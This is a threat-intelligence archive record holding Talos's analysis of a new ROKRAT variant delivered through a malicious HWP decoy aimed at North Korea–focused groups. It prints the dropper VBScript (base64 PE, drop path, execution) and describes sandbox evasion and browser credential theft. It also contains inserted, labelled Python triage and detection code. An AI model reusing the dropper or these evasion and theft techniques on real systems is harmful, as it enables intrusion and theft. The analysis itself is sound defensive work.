{
	"id": "b7d2a0c3-bb9a-4764-9e30-2a16ff71731d",
	"created_at": "2026-04-06T00:19:01.51294Z",
	"updated_at": "2026-04-10T13:12:52.545176Z",
	"deleted_at": null,
	"sha1_hash": "f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a",
	"title": "ROKRAT Reloaded",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1366124,
	"plain_text": "ROKRAT Reloaded\r\nBy Paul Rascagneres\r\nPublished: 2017-11-28 · Archived: 2026-04-05 20:42:48 UTC\r\nThis post was authored by Warren Mercer and Paul Rascagneres, with contributions from Jungsoo An.\r\nExecutive Summary\r\nEarlier this year, Talos published two articles concerning South Korean threats. The first covered a malicious HWP document that dropped downloaders used to retrieve payloads from several compromised websites, one of them a compromised government website. We named this case \"Evil New Years\". The second covered the discovery and analysis of the ROKRAT malware.\r\nThis month, Talos discovered a new ROKRAT version. It contains technical elements that link the two previous articles, reusing code from both publications:\r\nIt contains the same reconnaissance code;\r\nIt has a PDB path pattern similar to the one in the \"Evil New Years\" samples;\r\nIt contains the same cloud features and the same copy-paste habits that ROKRAT showed;\r\nIt uses cloud platforms as C\u0026C, but not exactly the same ones: this version uses pCloud, Box, Dropbox and Yandex.\r\nWe also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign.\r\nThe campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the \"Citizens' Alliance for North Korean Human Rights and Reunification of Korean Peninsula\". It mentions a meeting of this group that took place on the 1st of November in Seoul. 
Due to the content of this malicious document we can assume that the targets are interested in the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.\r\nhttps://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html\r\nPage 1 of 20\n\nThe malicious document mentions the \"Community of North Korean human right and unification\". We first observed this campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as '올인통 (올바른북한인권법과통일을위한시민모임)'.\r\nThe purpose of the document is to arrange a meeting to discuss items related to the 'North Korean Human Rights Act' and its enactment, which passed in 2016 in South Korea.\r\nBased on the meeting date (1st Nov 2017), this decoy document could have been delivered to the stakeholders of the community '올인통' before November 2017, pretending to be a request to join a discussion on better ways to get more people interested in their activity.\r\nThe HWP file contains an OLE object named BIN0001.OLE. 
Once extracted and uncompressed (zlib), we obtain the following script:\r\n' Base64-encoded PE: the TVqQ prefix decodes to the MZ header (the blob is truncated here)\r\nconst strEncode = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4A\r\nDIM outFile\r\nDIM base64Decoded\r\nDIM shell_obj\r\nSET shell_obj = CreateObject(\"WScript.Shell\")\r\nDIM fso\r\nSET fso = CreateObject(\"Scripting.FileSystemObject\")\r\n' Drop path chosen to look like a Hancom (Hnc) component\r\noutFile = \"c:\\ProgramData\\HncModuleUpdate.exe\"\r\nbase64Decoded = decodeBase64(strEncode)\r\n' Drop and run only once: if the file already exists, do nothing\r\nIF NOT(fso.FileExists(outFile)) then\r\n    writeBytes outFile, base64Decoded\r\n    shell_obj.run outFile\r\nEND IF\r\nWScript.Quit()\r\n' Base64 decode through MSXML: a bin.base64-typed element returns the raw bytes\r\nprivate function decodeBase64(base64)\r\n    DIM DM, EL\r\n    SET DM = CreateObject(\"Microsoft.XMLDOM\")\r\n    SET EL = DM.createElement(\"tmp\")\r\n    EL.DataType = \"bin.base64\"\r\n    EL.Text = base64\r\n    decodeBase64 = EL.NodeTypedValue\r\nend function\r\n' Write the byte array to disk with ADODB.Stream (Type 1 = adTypeBinary, SaveToFile option 1 = adSaveCreateNotExist)\r\nprivate Sub writeBytes(file, bytes)\r\n    DIM binaryStream\r\n    SET binaryStream = CreateObject(\"ADODB.Stream\")\r\n    binaryStream.Type = 1\r\n    binaryStream.Open\r\n    binaryStream.Write bytes\r\n    binaryStream.SaveToFile file, 1\r\nEnd Sub\r\nThe purpose of the script is to base64-decode the content of the strEncode variable, store the decoded data in the file c:\\ProgramData\\HncModuleUpdate.exe and execute it. The binary is the ROKRAT dropper. The specific filename 'HncModuleUpdate' may fool a user into thinking this is Hancom software.\r\nStage 1: Dropper\r\nThe purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. The dropper then starts a new cmd.exe process, injects the extracted resource into it and executes it. 
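Before going further into the dropper, the following Python example, added here and not part of the original post, shows how the script above can be triaged offline: it inflates the zlib-compressed OLE stream, pulls the base64 blob and the drop path out of the VBScript, decodes the payload and checks its MZ/PE headers before anything is executed. The sample stream is constructed inside the code (a script of the same shape carrying a fake, non-executable PE stub), and the helper names are this example's own.

```python
import base64
import hashlib
import struct
import zlib

# Characters assembled with chr() so the constructed sample below stays one plain ASCII literal.
Q = chr(34)               # double quote
BS = chr(92)              # backslash
CRLF = chr(13) + chr(10)  # the dropped WSH script is CRLF-terminated


def build_fake_pe():
    # Constructed stand-in for the dropper binary (not the real sample): a DOS header
    # whose first three bytes, 4D 5A 90, base64-encode to the same TVqQ prefix seen in
    # the real script, e_lfanew pointing right behind it, then a minimal COFF header
    # (i386, zero sections, EXECUTABLE_IMAGE | 32BIT_MACHINE). Nothing in it runs.
    dos = bytearray(0x40)
    dos[0:3] = bytes([0x4D, 0x5A, 0x90])
    struct.pack_into('<I', dos, 0x3C, 0x40)
    coff = struct.pack('<HHIIIHH', 0x14C, 0, 0, 0, 0, 0, 0x0102)
    return bytes(dos) + b'PE' + bytes(2) + coff


FAKE_PE = build_fake_pe()
DROP_PATH = 'c:' + BS + 'ProgramData' + BS + 'HncModuleUpdate.exe'

# Constructed VBScript with the same shape as the one carried in BIN0001.OLE.
SAMPLE_SCRIPT = CRLF.join([
    'const strEncode = ' + Q + base64.b64encode(FAKE_PE).decode('ascii') + Q,
    'DIM outFile',
    'outFile = ' + Q + DROP_PATH + Q,
    'base64Decoded = decodeBase64(strEncode)',
    'writeBytes outFile, base64Decoded',
    'shell_obj.run outFile',
])
# What the HWP actually carries: the script zlib-compressed inside the OLE stream.
SAMPLE_STREAM = zlib.compress(SAMPLE_SCRIPT.encode('ascii'))


def vbs_string_assignment(script, name):
    # Return the string literal assigned to name, whether as const or plain assignment.
    for line in script.splitlines():
        stripped = line.strip()
        lowered = stripped.lower()
        if lowered.startswith('const '):
            stripped, lowered = stripped[6:], lowered[6:]
        if lowered.startswith(name.lower()) and '=' in stripped:
            rhs = stripped.split('=', 1)[1].strip()
            if len(rhs) >= 2 and rhs.startswith(Q) and rhs.endswith(Q):
                return rhs[1:-1]
    return None


def inspect_pe(data):
    # Header sanity checks on the decoded payload: MZ magic, PE signature at e_lfanew,
    # machine type, section count and the DLL flag from Characteristics.
    if data[:2] != b'MZ':
        raise ValueError('payload is not an MZ image')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE' + bytes(2):
        raise ValueError('PE signature not found at e_lfanew')
    machine, nsections = struct.unpack_from('<HH', data, e_lfanew + 4)
    characteristics = struct.unpack_from('<H', data, e_lfanew + 22)[0]
    return {
        'size': len(data),
        'sha256': hashlib.sha256(data).hexdigest(),
        'e_lfanew': e_lfanew,
        'machine': machine,
        'sections': nsections,
        'dll': bool(characteristics & 0x2000),
    }


def triage_ole_stream(stream):
    # Inflate the OLE stream, pull the payload and drop path out of the script and
    # return what an analyst wants to know before anything is executed.
    script = zlib.decompress(stream).decode('ascii', errors='replace')
    blob = vbs_string_assignment(script, 'strEncode')
    if blob is None:
        raise ValueError('no strEncode constant in script')
    report = inspect_pe(base64.b64decode(blob, validate=True))
    report['drop_path'] = vbs_string_assignment(script, 'outFile')
    report['runs_payload'] = any(
        l.strip().lower().startswith('shell_obj.run') for l in script.splitlines())
    return report


if __name__ == '__main__':
    for key, value in triage_ole_stream(SAMPLE_STREAM).items():
        print(key, value)
```

On a real BIN0001.OLE, feed the inflated bytes to triage_ole_stream(): the sha256 is what to pivot on, and a missing PE signature at e_lfanew means the blob is not a straight base64 PE and deserves a closer look. The check is deliberately done on the decoded bytes rather than by running the script, so the payload never touches disk.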
The code injection is performed with the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:\r\nOnce executed, the shellcode decodes a PE file, loads it into the memory of cmd.exe and finally executes it. This payload is a new variant of ROKRAT.\r\nAdditionally, one of the analysed droppers displays a picture to the user:\r\nThe pictures show people from the Korean War and members of the independence troops of the \"independence movement\". The image on the top left comes from Wikipedia, the picture in the middle left from a blog, and the bottom left image from a news website. The decoy image appears to be a collage of public pictures.\r\nStage 2: ROKRAT\r\nSimilarities With the \"Evil New Years\" MalDoc\r\nThis variant of ROKRAT contains code similar to the \"Evil New Years\" downloader, and the information collected during the reconnaissance phase is similar. The malware reads the raw SMBIOS table from the following registry value to get the machine type: HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is used to identify the type of machine. Here is the graph flow of the \"Evil New Years\" downloader:\r\nThe graph flow of the ROKRAT variant:\r\nThe graph flows are 99% similar. Additionally, the machine type is described with the following strings:\r\nThe code appears to be based on a forum post describing the use of the Win32 APIs involved. 
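As an added example (neither the post's code nor the forum post's), the following Python parser shows where these fields actually live in the raw SMBiosData value: the System manufacturer and product name come from the type 1 record, and the chassis type byte of the type 3 record is mapped with the same ten-entry string table the malware uses. It assumes the registry value carries the 8-byte RawSMBIOSData header in front of the table, and it runs on a constructed table so it works offline.

```python
import struct

# The ten chassis strings the ROKRAT and Evil New Years code emit, keyed by the SMBIOS
# type-3 chassis type. Everything else, including 0x01 Other, 0x05 Pizza Box and
# 0x0D All in One, falls through to the default, as in the forum code it was taken from.
CHASSIS_STRINGS = {
    0x02: '(Unknown)',
    0x03: '(Desktop)',
    0x04: '(Low Profile Desktop)',
    0x06: '(Mini Tower)',
    0x07: '(Tower)',
    0x08: '(Portable)',
    0x09: '(Laptop)',
    0x0A: '(Notebook)',
    0x0E: '(Sub Notebook)',
}
DEFAULT_CHASSIS = '(Other)'

# RawSMBIOSData header that precedes the table in the SMBiosData registry value
# (assumed to match the GetSystemFirmwareTable layout): Used20CallingMethod,
# SMBIOSMajorVersion, SMBIOSMinorVersion, DmiRevision, Length.
RAW_HEADER = '<BBBBI'
NUL = bytes(1)


def chassis_string(code):
    # Bit 7 of the type-3 chassis byte is the chassis-lock flag, not part of the type.
    return CHASSIS_STRINGS.get(code & 0x7F, DEFAULT_CHASSIS)


def string_ref(strings, idx):
    # SMBIOS string references are 1-based; 0 means no string.
    return strings[idx - 1] if 0 < idx <= len(strings) else ''


def parse_structures(table):
    # Walk the structure table: 4-byte header (type, length, handle), a formatted area
    # of length bytes, then NUL-terminated strings ended by an extra NUL.
    pos, out = 0, []
    while pos + 4 <= len(table):
        stype, slen, handle = struct.unpack_from('<BBH', table, pos)
        if slen < 4:
            raise ValueError('corrupt structure length')
        formatted = table[pos:pos + slen]
        pos += slen
        strings = []
        if table[pos:pos + 1] == NUL:
            pos += 2                      # empty string set is just two NULs
        else:
            while True:
                end = table.index(NUL, pos)   # ValueError on a truncated table
                strings.append(table[pos:end].decode('ascii', errors='replace'))
                pos = end + 1
                if table[pos:pos + 1] == NUL:
                    pos += 1
                    break
        out.append((stype, handle, formatted, strings))
        if stype == 127:                  # End-of-Table
            break
    return out


def machine_profile(smbios_data):
    # Reproduce the reconnaissance step on a raw SMBiosData value: manufacturer and
    # product from the type-1 System Information record, chassis from type 3.
    _, major, minor, _, length = struct.unpack_from(RAW_HEADER, smbios_data, 0)
    table = smbios_data[8:8 + length]
    profile = {'smbios_version': (major, minor), 'manufacturer': '',
               'product': '', 'chassis': DEFAULT_CHASSIS}
    for stype, _, fmt, strings in parse_structures(table):
        if stype == 1 and len(fmt) > 5:
            profile['manufacturer'] = string_ref(strings, fmt[4])
            profile['product'] = string_ref(strings, fmt[5])
        elif stype == 3 and len(fmt) > 5:
            profile['chassis'] = chassis_string(fmt[5])
    return profile


def smbios_structure(stype, handle, fields, strings):
    # Build one structure; fields is the formatted area that follows the 4-byte header.
    head = struct.pack('<BBH', stype, 4 + len(fields), handle) + fields
    tail = b''.join(s.encode('ascii') + NUL for s in strings) if strings else NUL
    return head + tail + NUL


def build_sample(chassis_type):
    # Constructed SMBiosData value for a fictitious machine; not captured from a host.
    # Type 1 (length 0x1B) and type 3 (length 0x15) follow the SMBIOS 2.x layouts.
    system = smbios_structure(1, 0x0001, bytes([1, 2, 0, 0]) + bytes(16) + bytes([6, 0, 0]),
                              ['Contoso Computers', 'Workstation 9000'])
    enclosure = smbios_structure(3, 0x0003, bytes([1, 0x80 | chassis_type]) + bytes(15),
                                 ['Contoso Computers'])
    end = smbios_structure(127, 0x0007, b'', [])
    table = system + enclosure + end
    return struct.pack(RAW_HEADER, 0, 2, 7, 0, len(table)) + table


if __name__ == '__main__':
    for code in (0x09, 0x0D):
        print(hex(code), machine_profile(build_sample(code)))
```

On a Windows host the same bytes come from winreg.QueryValueEx on HKLM\\SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data, value SMBiosData. The lock-bit masking matters: a laptop whose enclosure reports a chassis lock carries 0x89 in that byte, not 0x09, and a table that ignored bit 7 would classify it as (Other).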
The source code only considers the following types:\r\ndefault: lpString = \"(Other)\"; break;\r\ncase 0x02: lpString = \"(Unknown)\"; break;\r\ncase 0x03: lpString = \"(Desktop)\"; break;\r\ncase 0x04: lpString = \"(Low Profile Desktop)\"; break;\r\ncase 0x06: lpString = \"(Mini Tower)\"; break;\r\ncase 0x07: lpString = \"(Tower)\"; break;\r\ncase 0x08: lpString = \"(Portable)\"; break;\r\ncase 0x09: lpString = \"(Laptop)\"; break;\r\ncase 0x0A: lpString = \"(Notebook)\"; break;\r\ncase 0x0E: lpString = \"(Sub Notebook)\"; break;\r\nNotice the parentheses, which the ROKRAT author kept as well. Some values are ignored, as we can see from the SMBIOS documentation:\r\nThe missing values are also omitted from the forum post.\r\nAnother similarity is the PDB path. The \"Evil New Year\" sample contained the following PDB path:\r\ne:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb\r\nThis new ROKRAT variant contains the following PDB path:\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb\r\nThe pattern is clearly similar.\r\nAnti-Sandbox\r\nThis ROKRAT variant contains anti-sandbox tricks. It checks whether the following libraries are loaded in the process:\r\nSbieDll.dll (Sandboxie library)\r\nDbghelp.dll (Microsoft debugging tools)\r\nApi_log.dll (ThreatAnalyzer / GFI SandBox)\r\nDir_watch.dll (ThreatAnalyzer / GFI SandBox)\r\nAnti-Debug\r\nThis ROKRAT version contains anti-debug tricks. For example, it uses the following NOP technique:\r\nnop dword ptr [eax+eax+00h] is a 5-byte NOP: 0F 1F 44 00 00. This opcode is not correctly supported by Immunity Debugger, so the assembly is replaced by \"???\" in red in the screenshot:\r\nScreenshots Feature\r\nBoth ROKRAT versions take screenshots. 
It is interesting to note the similarities between the two versions, especially the filename of the saved screenshot. Here is the April ROKRAT version:\r\nAnd the code of the November version:\r\nThe pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values, and the %s is a temporary path obtained with GetTempPath(). In both samples the buffer length is 0x12C (300). This part is clearly a copy-paste.\r\nBrowser Password Stealer\r\nOne of the analysed November ROKRAT samples contained a browser credential stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the SQLite database containing the URL, username and password:\r\nAdditionally, ROKRAT supports the Microsoft Vault mechanism. Vault was introduced in Windows 7 and holds sensitive data such as the Internet Explorer credentials. Here is the initialization of the Vault APIs:\r\nThe ROKRAT implementation is largely based on a public project. This is a change of tactic for ROKRAT compared with previous samples and versions: this time the actor is specifically targeting information that could be used for additional compromises, possibly including personal accounts. 
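For hunting, the combination described above is more distinctive than any single piece of it. The following Python example, added here and not taken from the post or from the projects it references, extracts ASCII and UTF-16LE strings from a binary and scores the co-occurrence of SQLite API names, the Chrome logins and Firefox moz_logins schema names, the vaultcli.dll Vault export names and the IE Registery typo mentioned below. The indicator names are real SQLite, browser and Windows identifiers, but that this exact set appears in the ROKRAT binary is this example's assumption; the sample blobs are constructed.

```python
# Indicator strings grouped by what they reveal. The SQLite API names, the Chrome
# logins and Firefox moz_logins schema names and the vaultcli.dll export names are
# real identifiers; that this exact set appears in the ROKRAT binary is an assumption
# of this example, not a quote from the post.
INDICATORS = {
    'sqlite': ['sqlite3_open', 'sqlite3_prepare', 'sqlite3_step', 'sqlite3_column_text'],
    'chrome': ['origin_url', 'username_value', 'password_value', 'Login Data'],
    # signons.sqlite is the legacy Firefox store; profiles since Firefox 32 use logins.json
    'firefox': ['moz_logins', 'signons.sqlite', 'encryptedPassword', 'logins.json'],
    'vault': ['VaultOpenVault', 'VaultEnumerateItems', 'VaultGetItem', 'VaultCloseVault'],
    'ie_registry': ['IE Registery'],   # the copy-pasted typo shared with FreeMilk
}
MIN_LEN = 5


def ascii_strings(data, min_len=MIN_LEN):
    # Runs of printable ASCII of at least min_len bytes.
    out, run = [], bytearray()
    for b in data:
        if 32 <= b < 127:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode('ascii'))
        run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode('ascii'))
    return out


def wide_strings(data, min_len=MIN_LEN):
    # UTF-16LE runs (printable low byte, zero high byte), tried at both byte alignments,
    # since PE string tables and Unicode imports are stored this way.
    out = []
    for start in (0, 1):
        run = bytearray()
        for i in range(start, len(data) - 1, 2):
            lo, hi = data[i], data[i + 1]
            if hi == 0 and 32 <= lo < 127:
                run.append(lo)
                continue
            if len(run) >= min_len:
                out.append(run.decode('ascii'))
            run = bytearray()
        if len(run) >= min_len:
            out.append(run.decode('ascii'))
    return out


def score_stealer(data):
    # Returns (verdict, hits). SQLite alone is common in legitimate software; the
    # combination of an embedded SQLite engine with browser credential schema names
    # is what is worth alerting on.
    found = set(ascii_strings(data)) | set(wide_strings(data))
    hits = {}
    for family, needles in INDICATORS.items():
        matched = sorted(n for n in needles if any(n in s for s in found))
        if matched:
            hits[family] = matched
    verdict = 'sqlite' in hits and ('chrome' in hits or 'firefox' in hits)
    return verdict, hits


def build_sample():
    # Constructed blob standing in for a stealer section; not bytes from a real sample.
    parts = [
        bytes(64),
        b'sqlite3_open', bytes(1), b'sqlite3_prepare_v2', bytes(1),
        b'SELECT origin_url, username_value, password_value FROM logins', bytes(3),
        b'moz_logins', bytes(1), b'IE Registery', bytes(1),
        'VaultEnumerateItems'.encode('utf-16-le'), bytes(2),
        'VaultGetItem'.encode('utf-16-le'), bytes(2),
        bytes(range(256)),
    ]
    return b''.join(parts)


def build_benign():
    # Constructed blob that embeds SQLite but touches no browser store: must not trigger.
    return (bytes(16) + b'sqlite3_open' + bytes(1) + b'sqlite3_step' + bytes(1)
            + b'CREATE TABLE notes(id INTEGER)' + bytes(8))


if __name__ == '__main__':
    print(score_stealer(build_sample()))
    print(score_stealer(build_benign()))
```

Run score_stealer() over the unpacked payload, not the dropper: the strings only appear once the shellcode has decoded the ROKRAT PE. The Vault names are matched through the wide-string pass because import names and API strings in a PE are often stored as UTF-16LE, which a plain ASCII strings run misses.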
The method used by the ROKRAT actors was also out of the ordinary: they embedded the whole SQLite library into their executable to allow the SQLite queries used against Firefox and Google Chrome.\r\nDuring our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the FreeMilk campaign described by Unit 42. In that article, the author had already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. We can add that code overlap is present between the two samples as well:\r\nOn the left is the ROKRAT sample and on the right the FreeMilk sample. Notice that in addition to the code, the author copy-pasted English typos such as \"IE Registery\".\r\npCloud\r\nBox\r\nDropbox\r\nYandex\r\nConclusion\r\nThis campaign shows that the actor behind ROKRAT is still active. Based on the PDB path, this could be the 13th version of the malware. The actor decided to use only legitimate cloud platforms, but changed some of them since the last incarnation. From an attacker's perspective it is an interesting choice: the traffic is encrypted by default with HTTPS, and the malicious flow can be hard to spot in the middle of legitimate traffic to these platforms. We can also see that the actor likes to reuse code already available on the internet in the various repositories mentioned throughout this post, i.e. GitHub, Code Project and other public forums.\r\nBased on the source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. 
This is further proven by the fact that ROKRAT shares code with the Freenki downloader used in the FreeMilk campaign.\r\nMoreover, the actor is consistently interested in the same pattern of targets: the decoy documents refer to precise elements of the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references to real meetings or conferences, showing a good knowledge of current events in North and South Korea.\r\nTogether, this information helps us understand the profile of the targeted systems and the interests of the threat actor.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\r\nIOCs\r\nPath: c:\\ProgramData\\HncModuleUpdate.exe\r\nMalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824\r\nDropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037\r\nDropper 
#2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14\r\nDropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f\r\nROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e\r\nFreenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5\r\nSource: https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html"
	],
	"report_names": [
		"ROKRAT-Reloaded.html"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434741,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a.pdf",
		"text": "https://archive.orkl.eu/f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a.txt",
		"img": "https://archive.orkl.eu/f9bbdfcef89e6b8b0f5437cde9b27e9e7fda969a.jpg"
	}
}